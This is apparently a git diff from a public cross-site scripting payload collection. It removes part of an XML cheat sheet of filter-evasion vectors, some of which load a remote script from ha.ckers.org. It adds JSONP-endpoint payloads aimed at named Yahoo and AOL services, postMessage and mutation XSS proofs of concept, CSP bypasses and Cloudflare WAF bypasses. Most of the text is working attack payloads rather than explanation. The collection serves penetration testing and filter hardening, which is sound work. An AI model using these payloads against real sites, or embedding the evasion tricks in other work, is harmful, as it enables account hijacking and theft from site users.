-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Evade Regex Filter 5</name>
-		<code>&lt;SCRIPT a=`&gt;` SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
-		<desc>And one last XSS attack (using grave accents) to evade this regex:
-	/&lt;script((\s+\w+(\s*=\s*(?:&quot;(.)*?&quot;|&apos;(.)*?&apos;|[^&apos;&quot;&gt;\s]+))?)+\s*|\s*)src/i</desc>
-
-		<label>XSS w/HTML Quote Encapsulation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Filter Evasion 1</name>
-		<code>&lt;SCRIPT&gt;document.write(&quot;&lt;SCRI&quot;);&lt;/SCRIPT&gt;PT SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
-
-		<desc>This XSS still worries me, as it would be nearly impossible to stop this without blocking all active content.</desc>
-		<label>XSS w/HTML Quote Encapsulation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Filter Evasion 2</name>
-		<code>&lt;SCRIPT a=&quot;>&apos;>&quot; SRC=&quot;http://ha.ckers.org/xss.js&quot;&gt;&lt;/SCRIPT&gt;</code>
-		<desc>Here&apos;s an XSS example that bets on the fact that the regex won&apos;t catch a matching pair of quotes but will rather find any quotes to terminate a parameter string improperly.</desc>
-
-		<label>XSS w/HTML Quote Encapsulation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>IP Encoding</name>
-		<code>&lt;A HREF=&quot;http://66.102.7.147/&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>URL Encoding</name>
-		<code>&lt;A HREF=&quot;http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Dword Encoding</name>
-		<code>&lt;A HREF=&quot;http://1113982867/&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Hex Encoding</name>
-		<code>&lt;A HREF=&quot;http://0x42.0x0000066.0x7.0x93/&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
-The total size of each number allowed is somewhere in the neighborhood of 240 total characters as you can see on the second digit, and since the hex number is between 0 and F the leading zero on the third hex digit is not required.</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Octal Encoding</name>
-		<code>&lt;A HREF=&quot;http://0102.0146.0007.00000223/&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
-Padding is allowed, although you must keep it above 4 total characters per class - as in class A, class B, etc...</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Mixed Encoding</name>
-		<code>&lt;A HREF=&quot;h&#x0A;tt&#09;p://6&amp;#09;6.000146.0x7.147/&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
-The tabs and newlines only work if this is encapsulated with quotes.</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Protocol Resolution Bypass</name>
-		<code>&lt;A HREF=&quot;//www.google.com/&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
-Protocol resolution bypass (// translates to http:// which saves a few more bytes). This is really handy when space is an issue too (two less characters can go a long way) and can easily bypass regex like &quot;(ht|f)tp(s)?://&quot; (thanks to Ozh (http://planetOzh.com/) for part of this one). You can also change the &quot;//&quot; to &quot;\\&quot;. You do need to keep the slashes in place, however, otherwise this will be interpreted as a relative path URL.</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Firefox Lookups 1</name>
-		<code>&lt;A HREF=&quot;//google&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>Firefox uses Google&apos;s &quot;feeling lucky&quot; function to redirect the user to any keywords you type in. So if your exploitable page is the top for some random keyword (as you see here) you can use that feature against any Firefox user. This uses Firefox&apos;s &quot;keyword:&quot; protocol. You can concatenate several keywords by using something like the following &quot;keyword:XSS+RSnake&quot;</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Firefox Lookups 2</name>
-		<code>&lt;A HREF=&quot;http://ha.ckers.org@google&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>This uses a very tiny trick that appears to work Firefox only, because if it&apos;s implementation of the &quot;feeling lucky&quot; function.  Unlike the next one this does not work in Opera because Opera believes that this is the old HTTP Basic Auth phishing attack, which it is not.  It&apos;s simply a malformed URL.  If you click okay on the dialogue it will work, but as a result of the erroneous dialogue box I am saying that this is not supported in Opera.</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;ns&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Firefox Lookups 3</name>
-		<code>&lt;A HREF=&quot;http://google:ha.ckers.org&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>This uses a malformed URL that appears to work in Firefox and Opera only, because if their implementation of the &quot;feeling lucky&quot; function.  Like all of the above it requires that you are #1 in Google for the keyword in question (in this case &quot;google&quot;).</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;ns&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;ns&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Removing Cnames</name>
-		<code>&lt;A HREF=&quot;http://google.com/&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).
-When combined with the above URL, removing &quot;www.&quot; will save an additional 4 bytes for a total byte savings of 9 for servers that have this set up properly.</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Extra dot for Absolute DNS</name>
-		<code>&lt;A HREF=&quot;http://www.google.com./&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed).</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>JavaScript Link Location</name>
-		<code>&lt;A HREF=&quot;javascript:document.location=&apos;http://www.google.com/&apos;&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>URL string evasion (assuming &quot;http://www.google.com/&quot; is programmatically disallowed)
-JavaScript link location</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-	<attack>
-		<name>Content Replace</name>
-		<code>&lt;A HREF=&quot;http://www.gohttp://www.google.com/ogle.com/&quot;&gt;XSS&lt;/A&gt;</code>
-		<desc>Content replace as an attack vector (assuming &quot;http://www.google.com/&quot; is programmatically replaced with null). I actually used a similar attack vector against a several separate real world XSS filters by using the conversion filter itself (like http://quickwired.com/kallahar/smallprojects/php_xss_filter_function.php) to help create the attack vector (&quot;java&amp;#x26;#x09;script:&quot; was converted into &quot;java&amp;#x09;script:&quot;.</desc>
-
-		<label>URL Obfuscation</label>
-		<browser>Browser support: [&lt;span class=&quot;s&quot;&gt;IE6.0&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;NS8.1-IE&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;NS8.1-G&lt;/span&gt;|&lt;span class=&quot;s&quot;&gt;FF1.5&lt;/span&gt;] [&lt;span class=&quot;s&quot;&gt;O8.54&lt;/span&gt;]</browser>
-
-	</attack>
-</xss>
diff --git a/XSS Injection/Files/xss.url.url b/XSS Injection/Files/xss.url.url
new file mode 100644
index 00000000..325158b1
--- /dev/null
+++ b/XSS Injection/Files/xss.url.url	
@@ -0,0 +1,3 @@
+<html>
+    <script>alert(document.domain)</script>
+</html>
\ No newline at end of file
diff --git a/XSS Injection/Intruders/0xcela_event_handlers.txt b/XSS Injection/Intruders/0xcela_event_handlers.txt
new file mode 100644
index 00000000..3957dd94
--- /dev/null
+++ b/XSS Injection/Intruders/0xcela_event_handlers.txt	
@@ -0,0 +1,105 @@
+FSCommand
+onAbort
+onActivate
+onAfterPrint
+onAfterUpdate
+onBeforeActivate
+onBeforeCopy
+onBeforeCut
+onBeforeDeactivate
+onBeforeEditFocus
+onBeforePaste
+onBeforePrint
+onBeforeUnload
+onBeforeUpdate
+onBegin
+onBlur
+onBounce
+onCellChange
+onChange
+onClick
+onContextMenu
+onControlSelect
+onCopy
+onCut
+onDataAvailable
+onDataSetChanged
+onDataSetComplete
+onDblClick
+onDeactivate
+onDrag
+onDragDrop
+onDragEnd
+onDragEnter
+onDragLeave
+onDragOver
+onDragStart
+onDrop
+onEnd
+onError
+onErrorUpdate
+onFilterChange
+onFinish
+onFocus
+onFocusIn
+onFocusOut
+onHashChange
+onHelp
+onInput
+onKeyDown
+onKeyPress
+onKeyUp
+onLayoutComplete
+onLoad
+onLoseCapture
+onMediaComplete
+onMediaError
+onMessage
+onMouseDown
+onMouseEnter
+onMouseLeave
+onMouseMove
+onMouseOut
+onMouseOver
+onMouseUp
+onMouseWheel
+onMove
+onMoveEnd
+onMoveStart
+onOffline
+onOnline
+onOutOfSync
+onPaste
+onPause
+onPopState
+onProgress
+onPropertyChange
+onReadyStateChange
+onRedo
+onRepeat
+onReset
+onResize
+onResizeEnd
+onResizeStart
+onResume
+onReverse
+onRowDelete
+onRowExit
+onRowInserted
+onRowsEnter
+onScroll
+onSeek
+onSelect
+onSelectStart
+onSelectionChange
+onStart
+onStop
+onStorage
+onSubmit
+onSyncRestored
+onTimeError
+onTrackChange
+onURLFlip
+onUndo
+onUnload
+seekSegmentTime
diff --git a/XSS Injection/Intruders/IntrudersXSS.txt b/XSS Injection/Intruders/IntrudersXSS.txt
index 3dbd1134..b7e741fa 100644
--- a/XSS Injection/Intruders/IntrudersXSS.txt	
+++ b/XSS Injection/Intruders/IntrudersXSS.txt	
@@ -63,7 +63,7 @@ javascript://--></title></style></textarea></script><svg "//' onclick=alert()//
 <x onclick=alert(1)>click this!
 <x oncopy=alert(1)>copy this!
 <x oncontextmenu=alert(1)>right click this!
-<x oncut=alert(1)>copy this!
+<x oncut=alert(1)>cut this!
 <x ondblclick=alert(1)>double click this!
 <x ondrag=alert(1)>drag this!
 <x contenteditable onfocus=alert(1)>focus this!
diff --git a/XSS Injection/Intruders/jsonp_endpoint.txt b/XSS Injection/Intruders/jsonp_endpoint.txt
index e514d818..12add242 100644
--- a/XSS Injection/Intruders/jsonp_endpoint.txt	
+++ b/XSS Injection/Intruders/jsonp_endpoint.txt	
@@ -24,6 +24,9 @@
 #Uber.com:
 "><script+src="https://mkto.uber.com/index.php/form/getKnownLead?callback=alert(document.domain);"></script>
 #AOL/Yahoo
+"><script+src="https://ads.yap.yahoo.com/nosdk/wj/v1/getAds.do?cb=alert(1337)"></script>
+"><script+src="https://mempf.yahoo.co.jp/offer?position=h&callback=alert(1337)"></script>
+"><script+src="https://suggest-shop.yahooapis.jp/Shopping/Suggest/V1/suggester?callback=alert(1)//&appid=dj0zaiZpPVkwMDJ1RHlqOEdwdCZzPWNvbnN1bWVyc2VjcmV0Jng9M2Y-"></script>
 "><script+src="https://www.aol.com/amp-proxy/api/finance-instruments/14.1.MSTATS_NYSE_L/?callback=confirm(9)//jQuery1120033838593671435757_1537274810388&_=1537274810389"></script>
 "><script+src="https://df-webservices.comet.aol.com/sigfig/ws?service=sigfig_portfolios&porttype=2&portmax=5&rf=http://www.dailyfinance.com&callback=jsonCallback24098%3balert(1)%2f%2f476&_=1537149044679"></script>
 "><script+src="https://api.cmi.aol.com/content/alert/homepage-alert?site=usaol&callback=confirm(1);//jQuery20108887725116629929_1528071050373472232&_=1528071050374"></script>
@@ -51,4 +54,4 @@
 #GoogleAPI's
 "><embed src='//ajax.googleapis.com/ajax/libs/yui/2.8.0r4/build/charts/assets/charts.swf?allowedDomain=\"})))}catch(e){alert(1337)}//' allowscriptaccess=always>
 "><script src=//ajax.googleapis.com/ajax/services/feed/find?v=1.0%26callback=alert%26context=1337></script>
-ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
\ No newline at end of file
+ng-app"ng-csp ng-click=$event.view.alert(1337)><script src=//ajax.googleapis.com/ajax/libs/angularjs/1.0.8/angular.js></script>
diff --git a/XSS Injection/README.md b/XSS Injection/README.md
index 7a10f491..1fe19782 100644
--- a/XSS Injection/README.md	
+++ b/XSS Injection/README.md	
@@ -13,10 +13,12 @@ Cross-site scripting (XSS) is a type of computer security vulnerability typicall
 - [XSS in HTML/Applications](#xss-in-htmlapplications)
 - [XSS in wrappers javascript and data URI](#xss-in-wrappers-javascript-and-data-uri)
 - [XSS in files (XML/SVG/CSS/Flash/Markdown)](#xss-in-files)
+- [XSS in PostMessage](#xss-in-postmessage)
 - [Blind XSS](#blind-xss)
   - [XSS Hunter](#xss-hunter)
   - [Other Blind XSS tools](#other-blind-xss-tools)
   - [Blind XSS endpoint](#blind-xss-endpoint)
+- [Mutated XSS](#mutated-xss)
 - [Polyglot XSS](#polyglot-xss)
 - [Filter Bypass and Exotic payloads](#filter-bypass-and-exotic-payloads)
   - [Bypass case sensitive](#bypass-case-sensitive)
@@ -141,6 +143,15 @@ Svg payload
 <svg id=alert(1) onload=eval(id)>
 "><svg/onload=alert(String.fromCharCode(88,83,83))>
 "><svg/onload=alert(/XSS/)
+
+Div payload
+<div onpointerover="alert(45)">MOVE HERE</div>
+<div onpointerdown="alert(45)">MOVE HERE</div>
+<div onpointerenter="alert(45)">MOVE HERE</div>
+<div onpointerleave="alert(45)">MOVE HERE</div>
+<div onpointermove="alert(45)">MOVE HERE</div>
+<div onpointerout="alert(45)">MOVE HERE</div>
+<div onpointerup="alert(45)">MOVE HERE</div>
 ```
 
 XSS for HTML5
@@ -253,7 +264,7 @@ vbscript:msgbox("XSS")
 </name>
 ```
 
-XSS in XML
+### XSS in XML
 
 ```xml
 <html>
@@ -264,7 +275,7 @@ XSS in XML
 </html>
 ```
 
-XSS in SVG
+### XSS in SVG
 
 ```xml
 <?xml version="1.0" standalone="no"?>
@@ -278,7 +289,7 @@ XSS in SVG
 </svg>
 ```
 
-XSS in SVG (short)
+### XSS in SVG (short)
 
 ```javascript
 <svg xmlns="http://www.w3.org/2000/svg" onload="alert(document.domain)"/>
@@ -288,7 +299,7 @@ XSS in SVG (short)
 <svg><title><![CDATA[</title><script>alert(3)</script>]]></svg>
 ```
 
-XSS in Markdown
+### XSS in Markdown
 
 ```csharp
 [a](javascript:prompt(document.cookie))
@@ -297,7 +308,7 @@ XSS in Markdown
 [a](javascript:window.onerror=alert;throw%201)
 ```
 
-XSS in SWF flash application
+### XSS in SWF flash application
 
 ```powershell
 Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain);
@@ -307,7 +318,7 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali
 
 more payloads in ./files
 
-XSS in SWF flash application
+### XSS in SWF flash application
 
 ```
 flashmediaelement.swf?jsinitfunctio%gn=alert`1`
@@ -328,7 +339,7 @@ flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}//
 phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}//
 ```
 
-XSS in CSS
+### XSS in CSS
 
 ```html
 <!DOCTYPE html>
@@ -347,6 +358,33 @@ div  {
 </html>
 ```
 
+## XSS in PostMessage
+
+> If the target origin is asterisk * the message can be sent to any domain has reference to the child page.
+
+```html
+<html>
+<body>
+    <input type=button value="Click Me" id="btn">
+</body>
+
+<script>
+document.getElementById('btn').onclick = function(e){
+    window.poc = window.open('http://www.redacted.com/#login');
+    setTimeout(function(){
+        window.poc.postMessage(
+            {
+                "sender": "accounts",
+                "url": "javascript:confirm('XSS')",
+            },
+            '*'
+        );
+    }, 2000);
+}
+</script>
+</html>
+```
+
 ## Blind XSS
 
 ### XSS Hunter
@@ -379,6 +417,21 @@ javascript:eval('var a=document.createElement(\'script\');a.src=\'https://yoursu
 - Referer Header
   - Custom Site Analytics
   - Administrative Panel logs
+- User Agent
+  - Custom Site Analytics
+  - Administrative Panel logs
+- Comment Box
+  - Administrative Panel
+
+## Mutated XSS
+
+Use browsers quirks to recreate some HTML tags when it is inside an `element.innerHTML`.
+
+Mutated XSS from Masato Kinugawa, used against DOMPurify component on Google Search. Technical blogposts available at https://www.acunetix.com/blog/web-security-zone/mutation-xss-in-google-search/ and https://research.securitum.com/dompurify-bypass-using-mxss/.
+
+```javascript
+<noscript><p title="</noscript><img src=x onerror=alert(1)>">
+```
 
 ## Polyglot XSS
 
@@ -520,6 +573,9 @@ You can bypass a single quote with &#39; in an on mousedown event handler
 <script>window['alert'](document['domain'])</script>
 ```
 
+Convert IP address into decimal format: IE. `http://192.168.1.1` == `http://3232235777`
+http://www.geektools.com/cgi-bin/ipconv.cgi
+
 ### Bypass parenthesis for string
 
 ```javascript
@@ -623,6 +679,38 @@ content['alert'](6)
 [12].forEach(alert);
 ```
 
+From [@theMiddle](https://www.secjuice.com/bypass-xss-filters-using-javascript-global-variables/) - Using global variables
+
+The Object.keys() method returns an array of a given object's own property names, in the same order as we get with a normal loop. That's means that we can access any JavaScript function by using its **index number instead the function name**.
+
+```javascript
+c=0; for(i in self) { if(i == "alert") { console.log(c); } c++; }
+// 5
+```
+
+Then calling alert is :
+
+```javascript
+Object.keys(self)[5]
+// "alert"
+self[Object.keys(self)[5]]("1") // alert("1")
+```
+
+We can find "alert" with a regular expression like ^a[rel]+t$ : 
+
+```javascript
+a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}} //bind function alert on new function a()
+
+// then you can use a() with Object.keys
+
+self[Object.keys(self)[a()]]("1") // alert("1")
+```
+
+Oneliner: 
+```javascript
+a=()=>{c=0;for(i in self){if(/^a[rel]+t$/.test(i)){return c}c++}};self[Object.keys(self)[a()]]("1")
+```
+
 From [@quanyang](https://twitter.com/quanyang/status/1078536601184030721) tweet.
 
 ```javascript
@@ -711,6 +799,8 @@ You don't need to close your tags.
 
 ```javascript
 %26%2397;lert(1)
+&#97;&#108;&#101;&#114;&#116;
+></script><svg onload=%26%2397%3B%26%23108%3B%26%23101%3B%26%23114%3B%26%23116%3B(document.domain)>
 ```
 
 ### Bypass using Katana
@@ -874,8 +964,25 @@ Works for CSP like `script-src self`
 <object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>
 ```
 
+### Bypass CSP by [@404death](https://twitter.com/404death/status/1191222237782659072)
+
+Works for CSP like `script-src 'self' data:`
+
+```javascript
+<script ?/src="data:+,\u0061lert%281%29">/</script>
+```
+
+
 ## Common WAF Bypass
 
+### Cloudflare XSS Bypasses by [@Bohdan Korzhynskyi](https://twitter.com/h1_ragnar) - 3rd june 2019
+
+```html
+<svg onload=prompt%26%230000000040document.domain)>
+<svg onload=prompt%26%23x000000028;document.domain)>
+xss'"><iframe srcdoc='%26lt;script>;prompt`${document.domain}`%26lt;/script>'>
+```
+
 ### Cloudflare XSS Bypass - 22nd march 2019 (by @RakeshMane10)
 
 ```
@@ -985,6 +1092,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow
 - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett 
 - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html)  
+- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/)
 - [postMessage XSS Bypass](https://hackerone.com/reports/231053)
 - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin
 - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans
@@ -998,3 +1106,5 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld
 - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) 
 - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html)
 - [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd)
+- [XSS cheat sheet - PortSwigger](https://portswigger.net/web-security/cross-site-scripting/cheat-sheet)
+- [mXSS Attacks: Attacking well-secured Web-Applications by using innerHTML Mutations - Mario Heiderich, Jörg Schwenk, Tilman Frosch, Jonas Magazinius, Edward Z. Yang](https://cure53.de/fp170.pdf)
diff --git a/XSS Injection/XSS in Angular.md b/XSS Injection/XSS in Angular.md
index fe778945..1749a9a8 100644
--- a/XSS Injection/XSS in Angular.md	
+++ b/XSS Injection/XSS in Angular.md	
@@ -1,18 +1,20 @@
-# XSS in Angular
+# XSS in Angular and AngularJS
+
+## Client Side Template Injection
 
 The following payloads are based on Client Side Template Injection.
 
-## Stored/Reflected XSS - Simple alert 
+### Stored/Reflected XSS - Simple alert in AngularJS
 
-> Angular as of version 1.6 have removed the sandbox altogether
+> AngularJS as of version 1.6 have removed the sandbox altogether
 
-Angular 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin)
+AngularJS 1.6+ by [Mario Heiderich](https://twitter.com/cure53berlin)
 
 ```javascript
 {{constructor.constructor('alert(1)')()}}
 ```
 
-Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265)
+AngularJS 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/1031534746084491265)
 
 ```javascript
 {{[].pop.constructor&#40'alert\u00281\u0029'&#41&#40&#41}}
@@ -20,7 +22,7 @@ Angular 1.6+ by [@brutelogic](https://twitter.com/brutelogic/status/103153474608
 
 Example available at [https://brutelogic.com.br/xss.php](https://brutelogic.com.br/xss.php?a=<brute+ng-app>%7B%7B[].pop.constructor%26%2340%27alert%5Cu00281%5Cu0029%27%26%2341%26%2340%26%2341%7D%7D)
 
